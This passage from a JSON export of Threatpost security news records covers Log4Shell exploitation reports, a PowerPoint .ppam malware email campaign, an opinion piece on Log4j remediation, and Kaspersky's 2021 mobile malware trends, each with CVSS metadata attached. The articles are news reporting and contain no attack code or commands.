that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Attackers are using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings to take over an end user\u2019s computer, researchers have found.\n\nIt\u2019s one of a number of stealthy ways threat actors recently have been targeting desktop users through trusted applications they use daily, using emails that are designed to evade security detections and appear legitimate.\n\nNew research from Avanan, a Check Point company, has uncovered how a \u201clittle-known add-on\u201d in PowerPoint \u2013 the .ppam file \u2013 is being used to hide malware. Jeremy Fuchs, cybersecurity researcher and analyst at Avanan, wrote in [a report published](<https://www.avanan.com/blog/using-.ppam-files-to-wrap-executable-content>) Thursday that the file has bonus commands and custom macros, among other functions.\n\nBeginning in January, researchers observed attackers delivering socially engineered emails that include .ppam file attachments with malicious intent.\n\n## **Email Attack Vector**\n\nOne email observed in the campaign, for example, purported to be sending the recipient a purchase order. The attached .ppam file \u2013 named PO04012022 to appear legitimate \u2013 included a malicious executable, Fuchs said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03084259/email-posing-as-PO-e1643895792498.jpg>)\n\nMalicious email posing as standard purchase order. Source: Avanan.\n\nThe payload executed a number of functions on the end user\u2019s machine that were not authorized by the user, including installing new programs that create and open new processes, changing file attributes, and dynamically calling imported functions.\n\n\u201cBy combining the potential urgency of a purchase order email, along with a dangerous file, this attack packs a one-two punch that can devastate an end-user and a company,\u201d Fuchs wrote.\n\nThe campaign allows attackers to bypass a computer\u2019s existing security \u2013 in this case, security provided by Google \u2013 with a file that\u2019s rarely used and thus won\u2019t trip an email scanner, he said.\n\n\u201cPlus, it shows the potential dangers of this file, as it can be used to wrap any sort of malicious file, including ransomware,\u201d Fuchs wrote.\n\nIndeed, in October, reports surfaced that attackers were using .ppam files to wrap ransomware, he said, citing [a report](<https://www.pcrisk.com/removal-guides/14314-ppam-ransomware#:~:text=Discovered%20by%20Petrovic%2C%20Ppam%20is,placing%20it%20in%20all%20folders.>) on the Ppam ransomware published in October by the cybersecurity portal [PCrisk](<https://www.pcrisk.com/>).\n\n## **Targeting Desktop Users**\n\nThe latest scam is one of several new email-based campaigns uncovered by researchers recently to target desktop users working on commonly used word-processing and collaboration apps like Microsoft Office, Google Docs and Adobe Creative Cloud. Attackers typically use email to deliver malicious files or links that steal user information.\n\nIn November, reports surfaced that scammers were using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) to trick users into clicking on malicious links in emails or push notifications that invited people to share a Google document. The links directed users to websites that stole their credentials.\n\nThen a wave of phishing attacks that Avanan researchers [identified in December](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>) targeted mainly Outlook users, leveraging the \u201cComments\u201d feature of Google Docs to send malicious links that also lifted credentials from victims.\n\nLast month, the Avanan team reported on another scam that researchers observed in December in which threat actors were found [creating accounts within the Adobe Cloud suite](<https://threatpost.com/adobe-cloud-steal-office-365-gmail-credentials/177625/>) and sending images and PDFs that appear legitimate but instead deliver malware to Office 365 and Gmail users.\n\n## **Mitigations and Prevention**\n\nTo avoid allowing email scams to slip past corporate users, Fuchs recommended some typical precautions to security administrators that should be implemented consistently.\n\nOne is to install email protection that downloads all files into a sandbox and to inspect them for malicious content. Another is to take extra security steps \u2013 such as dynamically analyzing emails for indicators of compromise (IoCs) \u2013 to ensure the safety of messages coming into the corporate network, he said.\n\n\u201cThis email failed an SPF check and there was an insignificant historical reputation with the sender,\u201d Fuchs wrote of the phishing message observed by Avanan researchers. SPF, Sender Policy Framework, is an email authentication technique used to prevent spammers and other bad actors from sending messages spoofed to come from another domain name.\n\nCorporations also should continuously encourage end users in their networks to contact their IT department if they see an unfamiliar file come over via email, he added.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T14:00:25", "type": "threatpost", "title": "PowerPoint Files Abused to Take Over Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T14:00:25", "id": "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "href": "https://threatpost.com/powerpoint-abused-take-over-computers/178182/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T13:31:38", "description": "It\u2019s not my intention to be alarmist about the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)), known as Log4Shell, but this one is pretty bad. \n\nFirst of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity &amp; Infrastructure Security Agency (CISA) says this is the [most serious vulnerability](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>) she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times_ every minute._ The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.\n\nOK, maybe it is time for alarm.\n\nLog4j is open-source software from the Apache Software Foundation. [As explained by The Conversation](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>), this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j allows users of the software to specify custom code for formatting a log message. This feature also allows third-party servers to submit software code that can perform all kinds of actions \u2013 including malicious ones \u2013 on the targeted computer. The result of an exploit for the bug is that an attacker can control a targeted server remotely.\n\n## **Attackers Took Early Advantage**\n\nWithin weeks of discovery of the flaw in mid-December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.\n\nHow prevalent is Log4j in business systems? [Analysis by Wiz and Ernst &amp; Young](<https://blog.wiz.io/10-days-later-enterprises-halfway-through-patching-log4shell/>) of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability. \n\n[Google researchers discovered](<https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j>) that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability\u2014an \u201cenormous\u201d amount by all standards of ecosystem impact. \n\nSo, yeah, that\u2019s pretty extensive presence of this vulnerability. As for the global impact, it\u2019s still too early to tell. Much will depend on how well organizations respond to the threat.\n\n## **Everyone Must Take Action**\n\nFor everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption. \n\nAs for the moral imperative, the Federal Trade Commission points out that [companies have a responsibility to take steps \u201cto reduce the likelihood of harm to consumers.\u201d](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) With the fallout from the Equifax breach still fresh in memory, the FTC warns that it \u201cintends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\u201d Not every company serves consumers, of course, but that shouldn\u2019t matter with regard to addressing this issue.\n\nCISA issued a list of [\u201cimmediate actions\u201d](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak. \n\nAfter that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack. \n\nIt\u2019s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.\n\n## **How Effective Are Your Security Tools?**\n\nSecurity tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn\u2019t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.\n\nEvery organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes. \n\nLog4Shell is a wake-up call for everyone. We shouldn\u2019t hit the snooze button until the next vulnerability comes around.\n\n_**Saryu Nayyar is CEO at [Gurucul](<https://gurucul.com/>). \n**_**_ \nEnjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:21:04", "type": "threatpost", "title": "The Log4j Vulnerability Puts Pressure on the Security World", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T20:21:04", "id": "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "href": "https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T21:23:04", "description": "The number of cyberattacks launched against mobile users was down last year, researchers have found \u2014 but don\u2019t pop the champagne just yet. The decline was offset by jacked-up, more sophisticated, more nimble mobile nastiness.\n\nIn a Monday [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>), Kaspersky said that its researchers have observed a downward trend in the number of attacks on mobile users, as shown in the chart below. However, \u201cattacks are becoming more sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky experts Tatyana Shiskova and Anton Kivva.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22151706/downware-mobile-malware-trend-e1645561041683.png>)\n\nNumber of attacks on mobile users, 2019\u20132021. Source: Kaspersky.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cIn the reporting period, after a surge in H2 2020, cybercriminal activity gradually abated: There were no global newsbreaks or major campaigns, and the COVID-19 topic began to fade,\u201d according to Monday\u2019s report. \u201cAt the same time, new players continue to emerge on the cyberthreat market as malware becomes more sophisticated; thus, the fall in the overall number of attacks is \u2018compensated\u2019 by the greater impact of a successful attack. Most dangerous of all in this regard are [banking malware](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) and [spyware](<https://threatpost.com/new-android-spyware-poses-pegasus-like-threat/176155/>).\u201d\n\nThe company\u2019s mobile products and technologies detected 97,661 new mobile banking trojans, along with 3,464,756 malicious installation packages and 17,372 new mobile ransomware trojans.\n\nThe number of malicious installation packages observed in 2021 actually dropped substantially, down 2,218,938 from 2020 and slightly down from the 3,503,952 packages discovered in 2019.\n\n## New Tricks for Mobile Banking Malware\n\nLast year, banking trojans learned a number of new tricks. For example, the Fakecalls banker, which targets Korean mobile users, is now \u201c[dropping] outgoing calls to the victim\u2019s bank and plays pre-recorded operator responses stored in the trojan\u2019s body,\u201d according to the report.\n\nOther old dogs learning new tricks include the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), \u201cenabling attackers to access the user\u2019s current session and personal mobile banking account without knowing the login credentials.\u201d\n\nIn 2021, cybercriminals also went after mobile gaming credentials \u2013 which are often sold later on the darknet or used to steal in-game goods from users. Last year, for example, marked the first time that researchers spotted what they called a[ \u201cGamethief-type mobile trojan](<https://securelist.com/it-threat-evolution-q1-2021-mobile-statistics/102547/#quarterly-highlights>),\u201d aimed at stealing account credentials for the mobile version of PlayerUnknown\u2019s Battlegrounds (PUBG).\n\nAs well, the Vultur backdoor \u2013 found packed into a malicious, fully functional two-factor authentication (2FA) app discovered last month on Google Play \u2013 picked up the capability of using Virtual Network Computing (VNC) to snoop on targets by recording smartphone screens: \u201cWhen the user opens an app that is of interest to attackers, they can monitor the on-screen events,\u201d researchers said.\n\nOther trends spotted in 2021: fewer pandemic/COVID-19 topics used as bait, and more pop-culture lures, such as Squid Game. Kaspersky pointed to the [Joker trojan](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) on Google Play, which was found masquerading \u201cas an app with a background wallpaper in the style of Squid Game.\u201d\n\n## Google Play Still Infested\n\nSpeaking of the malware-ridden Play Store, regardless of Google\u2019s attempts to scrub its app store clean, it\u2019s still a bit of a roach motel. ThreatFabric researchers recently sniffed out 300,000 banking trojan [infections](<https://threatpost.com/banking-trojan-infections-google-play/176630/>) in Google Play during a four-month period.\n\nKaspersky also called out what it said were \u201crepeat incidents of malicious code injection into popular apps through advertising SDKs,\u201d as in the \u201csensational\u201d case of [CamScanner](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>): a malicious app spotted in the Google Play store in August 2019 that tallied 100 million downloads.\n\nResearchers noted that they also found [malicious code](<https://threatpost.com/sophisticated-android-spyware-google-play/155202/>) inside ad libraries in [the official client](<https://securelist.com/apkpure-android-app-store-infected/101845/>) for the third-party marketplace known as APKpure, as well as in a [modified WhatsApp build](<https://threatpost.com/custom-whatsapp-build-malware/168892/>).\n\nOne example was particularly alarming, from a security hygiene perspective: the malicious, fully functional 2FA app that hung out in Google Play for [more than two weeks](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>), managing to cling to 10,000 downloads. It came loaded with the Vultur stealer malware that targets and swoops down on financial data.\n\nAmong all of last year\u2019s many banking-trojans moves, researchers found the resurgence of Joker especially notable. The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play, in a mobile app called Color Message, after which it snuck into more than a half-million downloads before the store collared it.\n\nKaspersky researchers also called out the [Facestealer](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>) trojan: a family of Android trojans that uses social engineering to rip off victims\u2019 Facebook credentials.\n\nThese trojans most commonly sneak into Google Play by masquerading as a legitimate app, such as a photo editor or VPN service, to which they add a small code snippet to decrypt and launch their payload, the researchers explained. To confound analysis, such malware often uses a command-and-control (C2) server to send unpacking commands that get carried out in multiple steps: \u201cEach decrypted module contains the address of the next one, plus instructions for decrypting it,\u201d they said.\n\n## Most of It\u2019s Still Adware\n\nAt 42 percent, adware was yet again the biggest slice of the mobile malware pie, even though it fell 14.83 percentage points over the prior year. In 2020, adware was also the No. 1 mobile menace, at 57 percent.\n\nNext in prevalence were potentially unwanted riskware apps at 35 percent: a share increase of 14 percentage points, after a sharp decline in 2019\u20132020. As [defined](<https://usa.kaspersky.com/resource-center/threats/riskware>) by Kaspersky, riskware are legitimate programs \u201cthat pose potential risks due to security vulnerability, software incompatibility or legal violations.\u201d\n\nIn third place were trojan threats at 9 percent: a share that rose by 4 percentage points year-over-year.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T21:00:36", "type": "threatpost", "title": "Gaming, Banking Trojans Dominate Mobile Malware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T21:00:36", "id": "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "href": "https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/", "cvss": {"score": 9.3, "vector": 